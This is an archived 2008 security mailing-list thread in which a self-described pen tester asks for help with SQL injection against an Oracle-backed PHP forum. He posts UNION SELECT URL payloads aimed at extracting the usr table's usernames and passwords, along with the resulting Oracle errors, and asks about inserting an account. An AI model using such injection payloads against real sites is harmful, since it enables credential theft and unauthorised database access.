One more step closer
I'm able to enumerate the column names for user table
as username and password.
http://x.y.z.a/item.php?Id=90%20union%20select%20username,password%20from%20usr
This doesn't generate an error. If I change column
names a bit I get error.
Unfortunately I'm not getting the data returned in
HTML. This is a private forum site. With the url above
I do get the page for the correct forum but nothing
about usr table.
Any pointers?
Can I use union to insert a username and password in
usr table?
--- Clone <c70n3@yahoo.co.in> wrote:
Hmm.. with Jeff's input below I enumerate that there
are 2
columns.
This time I gave
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
Now I get following error:
ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-01790: expression must have same datatype as
corresponding expression in dbs.inc on line 44
The I tried following:
http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
And get the error
ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-00911: invalid character in dbs.inc on line 44
The functionality of the page is to generate an
email
page/forum email page.
Any idea what's next?
--- Joseph McCray <joe@learnsecurityonline.com>
wrote:
How are you coming along with this? Are you still
having trouble?
Joe
On Fri, 2008-01-18 at 00:21 +0000, Clone wrote:
Hey List
I am pen testing a web app that supplies sql
parameters on the URL something like
http://x.y.z.a/item.php?Id=90
I did blind sql injection by adding AND 1=1 to
confirm
the vulnerability.
Now when I do
http://x.y.z.a/item.php?Id=90'
I get
ociparse() [function.ociparse]: OCIParse:
ORA-01756:
quoted string not properly terminated in
item.php
on
line 312
Then I tried (after confirming presence of usr
table
name)
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
and I get the error
ociexecute() [function.ociexecute]:
OCIStmtExecute:
ORA-01789: query block has incorrect number of
result
columns in dbs.inc on line 44
I know one valid user account in the oracle DB.
Any idea what's the best strategy to move
forward?
I'm not getting any further from here so far.
Any advise / helpo would be much appreciated.
Cheers'
5, 50, 500, 5000 - Store N number of mails
in your inbox. Go to
http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution
FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
--
Joe McCray
Toll Free: 1-866-892-2132
Email: joe@learnsecurityonline.com
Web: https://www.learnsecurityonline.com
Learn Security Online, Inc.
* Security Games * Simulators
* Challenge Servers * Courses
* Hacking Competitions * Hacklab Access
"The only thing worse than training good employees
and losing them
is NOT training your employees and keeping them."
- Zig Ziglar
Download prohibited? No problem. CHAT from any
browser, without download. Go to
http://in.messenger.yahoo.com/webmessengerpromo.php/
Now you can chat without downloading messenger. Go to
http://in.messenger.yahoo.com/webmessengerpromo.php
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
